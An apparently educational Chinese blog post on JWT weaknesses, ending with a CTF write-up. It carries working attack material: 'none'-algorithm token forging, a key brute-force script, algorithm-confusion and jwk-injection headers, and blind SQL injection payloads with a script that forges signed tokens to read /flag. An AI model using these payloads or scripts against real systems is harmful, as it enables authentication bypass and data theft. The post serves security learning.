美文网首页
JWT漏洞学习

JWT漏洞学习

作者: Tide_诺言 | 来源:发表于2021-04-15 15:24 被阅读0次

1、JWT简介

JWT(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,JWT可用于身份认证、会话状态维持、信息交换等。

1.1、 JWT优缺点

  • JWT的优点:
    1、可扩展性好
    应用程序分布式部署的情况下,session需要做多机数据共享,通常可以存在数据库或者redis里面。而jwt不需要。
    2、无状态 jwt不在服务端存储任何状态
    RESTful API的原则之一是无状态,发出请求时,总会返回带有参数的响应,不会产生附加影响。用户的认证状态引入这种附加影响,这破坏了这一原则。另外jwt的载荷中可以存储一些常用信息,用于交换信息,有效地使用 JWT,可以降低服务器查询数据库的次数。
  • JWT的缺点:
    1、安全性低
    由于jwt的payload是使用base64url编码的,可以直接解码,因此jwt中不能存储敏感数据。而session的信息是存在服务端的,相对来说更安全。
    2、性能差
    jwt太长。由于是无状态使用JWT,所有的数据都被放到JWT里,如果还要进行一些数据交换,那载荷会更大,经过编码之后导致jwt非常长,cookie的限制大小一般是4k,cookie很可能放不下,所以jwt一般放在local storage里面。并且用户在系统中的每一次http请求都会把jwt携带在Header里面,http请求的Header可能比Body还要大。而sessionId只是很短的一个字符串,因此使用jwt的http请求比使用session的开销大得多。

1.2、JWT的构成

JWT token由三部分组成,分别是头部、载荷、签名,中间以点隔开。

Header.Payload.Signature
  • Header
    header用来声明token的类型和签名用的算法等,需要经过Base64Url编码。
    如下:
{"alg":"HS256","typ":"JWT"}
  • Payload
    payload用来表示真正的token信息,也需要经过Base64Url编码。
    有7个字段分别是:
iss (issuer):JWT的发行者
exp (expiration time):过期时间
sub (subject):JWT面向的主题
aud (audience):JWT的用户
nbf (Not Before):生效时间
iat (Issued At):签发时间
jti (JWT ID):JWT唯一标识

支持自定义字段

{
  "sub": "123456789",
  "id": "98",
  "admin": true
}
  • Signature
    首先这个部分需要BASE64加密后的header和payload,然后使用进行连接组成的字符串,然后通过header中指定的加密方式,进行加盐值secret组合加密,然后就构成了JWT的第三部分。
data = base64urlEncode(header) + "." + base64urlEncode(payload)
signature = HMAC-SHA256(data,secretkey)

Base64URL算法是base64的修改版,是为了方便在web中传输使用了不同的编码表,不会在末尾填充=号,并将+和/分别改为-和_
HMAC算法是密钥相关的哈希运算消息认证码(Hash-based Message Authentication Code)的缩写,它是一种对称加密算法,使用相同的密钥对传输信息进行加解密。
RSA算法则是一种非对称加密算法,使用私钥加密明文,公钥解密密文。
在HMAC和RSA算法中,都是使用私钥对signature字段进行签名,只有拿到了加密时使用的私钥,才有可能伪造token。

RS256 (采用SHA-256 的 RSA 签名) 是一种非对称算法, 它使用公共/私钥对: 标识提供方采用私钥生成签名, JWT 的使用方获取公钥以验证签名。由于公钥 (与私钥相比) 不需要保护, 因此大多数标识提供方使其易于使用方获取和使用 (通常通过一个元数据URL)。
HS256 (带有 SHA-256 的 HMAC 是一种对称算法, 双方之间仅共享一个 密钥。由于使用相同的密钥生成签名和验证签名, 因此必须注意确保密钥不被泄密。

我们通常使用https://jwt.io/来解密jwt。

1.3、JWT认证流程

1、用户使用用户名密码来请求服务器
2、服务器进行验证用户的信息
3、服务器通过验证发送给用户一个JWTtoke
4、客户端存储token,并在每次请求时附送上这个JWTtoken值
5、服务端验证token值,并返回数据

2、JWT存在的安全风险

2.1、敏感信息泄露

payload和header只经过Base64Url编码,如果开放者把一些敏感信息存放到里面,我们可以轻松获得。
使用https://jwt.io/#debugger-io

2.2、未校验签名

某些服务端并未校验JWT签名,所以,可以尝试修改signature后(或者直接删除signature)看其是否还有效。

2.3、签名算法可被修改为none

将 head中alg的值改为none,可能绕过签名认证。

修改前:
{
  "alg": "HS256",
  "typ": "JWT"
}
修改后:
{
  "alg": "none",
  "typ": "JWT"
}

服务端接收到token后会将其认定为无加密算法, 于是对signature的检验也就失效了,那么我们就可以随意修改payload部分伪造token。
https://jwt.io/#debugger-io 会识别这种恶意行为,我们可以借助python的pyjwt库实现。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import jwt
payload = {"user":"admin","iat":1612336103}
print(jwt.encode(payload,None,algorithm="none"))

生成的JWT token只存在Header和Payload部分,Signature部分不存在。

2.4、签名密钥可被爆破

alg指定了加密算法,可以进行针对key进行暴力破解。
爆破脚本:https://github.com/Ch1ngg/JWTPyCrack
下面代码也可以

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import jwt
import sys

def burp_jwt(jwt_json,dicts):
    with open(dicts) as f:
        for line in f:
            key = line.strip()
            try:
                jwt.decode(jwt_json,verify=True,key=key,algorithm='HS256')
                print('found key! --> ' +  key)
                break
            except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                print('found key! --> ' +  key)
                break
            except(jwt.exceptions.InvalidSignatureError):
                print('verify key! -->' + key)
                continue
        else:
            print("key not found!")

if __name__ == '__main__':
    if(len(sys.argv) == 3):
        print('User: please burp_jwt.py jwt_json dict.txt')
        jwt_json = sys.argv[1]
        dicts = sys.argv[2]
        burp_jwt(jwt_json,dicts)
    else:
        print('User: please please burp_jwt.py jwt_json dict.txt')

爆破出key后,就可以任意修改token了


2.5、修改非对称密码算法为对称密码算法

JWT的签名加密算法有两种,对称加密算法和非对称加密算法。
对称加密算法比如HS256,加解密使用同一个密钥,保存在后端。
非对称加密算法比如RS256,后端加密使用私钥,前端解密使用公钥,公钥是我们可以获取到的。
如果我们修改header,将算法从RS256更改为HS256,后端代码会使用RS256的公钥作为HS256算法的密钥。于是我们就可以用RS256的公钥伪造数据
CTF题目:http://demo.sjoerdlangkemper.nl/jwtdemo/rs256.php

2.6、伪造密钥(CVE-2018-0114)

jwk是header里的一个参数,用于指出密钥,存在被伪造的风险。
攻击者可以通过以下方法来伪造JWT:删除原始签名,向标头添加新的公钥,然后使用与该公钥关联的私钥进行签名。
如下:

{
  "typ": "JWT",
  "alg": "RS256",
  "jwk": {
    "kty": "RSA",
    "kid": "TEST",
    "use": "sig",
    "e": "AQAB",
    "n": "oUGnPChFQAN1xdA1_f_FWZdFAis64o5hdVyFm4vVFBzTIEdYmZZ3hJHsWi5b_m_tjsgjhCZZnPOLn-ZVYs7pce__rDsRw9gfKGCVzvGYvPY1hkIENNeBfSaQlBhOhaRxA85rBkg8BX7zfMRQJ0fMG3EAZhYbr3LDtygwSXi66CCk4zfFNQfOQEF-Tgv1kgdTFJW-r3AKSQayER8kF3xfMuI7-VkKz-yyLDZgITyW2VWmjsvdQTvQflapS1_k9IeTjzxuKCMvAl8v_TFj2bnU5bDJBEhqisdb2BRHMgzzEBX43jc-IHZGSHY2KA39Tr42DVv7gS--2tyh8JluonjpdQ"
  }
}

2.7、JWT自动化工具

https://github.com/ticarpi/jwt_tool

3、CTF例题

2020 网鼎杯 玄武组 js_on
admin/admin 弱口令登录得到key




通过查看数据包发现JWT token


对JWT token进行解密,发现使用了hs256对称加密。



当前用户为admin,测试user参数可能存在sql注入。


对空格进行了过滤,使用/**/绕过限制
经过判断注入点类型为布尔型盲注

"user": "admin'/**/and/**/1=1#"
image.png
"user": "admin'/**/and/**/1=2#"
image.png
image.png

通过load_file函数读取跟目录下的flag值

  • 关键字之间添加<a>
  • 空格使用注释符/**/绕过
admin'/**/and/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),1,1))>32#

利用mid函数一位一位分割,并通过ascii码进行计算

#!/usr/bin/env python3
# coding=utf-8
import jwt
import requests
import re


key = "xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"
url = "http://challenge-435b4c15ad92eb0a.sandbox.ctfhub.com:10080/index.php"
payloadTmpl = "admin'/**/and/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),{},1))>{}#"

def sql_jwt():
    result = ""
    for i in range(1,50):
        min = 31
        max = 127
        while abs(max-min) > 1:
            mid = (min + max)//2
            payload = payloadTmpl.format(i,mid)
            print(payload)
            jwttoken = {
                "user": payload,
                "news": "hello"
            }
            payload = jwt.encode(jwttoken, key, algorithm='HS256')
            cookies = dict(token=str(payload))
            res = requests.get(url,cookies=cookies)
            if re.findall("hello", res.text) != []:
                min = mid
            else:
                max = mid
        result += chr(max)
        print(result)

if __name__ == "__main__":
    sql_jwt()

运行脚本得到flag


image.png

安全建议

  • 保证密钥不会泄漏
  • 签名算法固定在后端
  • JWT中禁止存放敏感信息
  • 合理规定JWT的有效时间

参考链接

https://www.freebuf.com/vuls/211842.html
https://zhuanlan.zhihu.com/p/93129166
https://www.jianshu.com/p/60dbcaea510c

相关文章

  • JWT漏洞学习

    1、JWT简介 JWT(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保...

  • 安全经典JWT算法漏洞

    1、什么是JWT? JSON Web令牌(JWT)是一个开放标准(RFC 7519),它定义了一种紧凑而独立的方法...

  • 麻麻!有人攻击我!!!

    前言:昨天收到老大投递的一个bug,说我们项目里面被检查出来有XSS漏洞。纳尼?前天学习JWT的时候恰好扩展性的看...

  • 【密钥泄漏】CVE-2022-29266 Apache Apis

    漏洞描述 在2.13.1版本之前的APache APISIX中,攻击者可以通过向受 jwt-auth 插件保护的路...

  • jwt学习

    jwt是如何验证的? jwt保存在客户端,每次请求时都将其放在header中,这样服务器接收到请求后,取出jwt进...

  • jwt 学习

    安全认证 [TOC] 库 CORS:解决跨域问题 https://github.com/expressjs/cor...

  • JWT 学习

    前言 在实际测试网站时多次遇到JWT认证,赶紧把这块知识点通过CTF题目的方式补上。 JWT 定义 JWT 全称是...

  • JsonWebToken

    JWT (JsonWebToken) JWT官网['https://jwt.io/'] JWT简介 1.JWT(J...

  • http走私漏洞学习(2)--http走私常见方法

    http走私漏洞学习(1)--http走私简介http走私漏洞学习(2)--http走私常见方法http走私漏洞学...

  • http走私漏洞学习(3)--http走私漏洞利用

    http走私漏洞学习(1)--http走私简介http走私漏洞学习(2)--http走私常见方法http走私漏洞学...

网友评论

      本文标题:JWT漏洞学习

      本文链接:https://www.haomeiwen.com/subject/ozcqqltx.html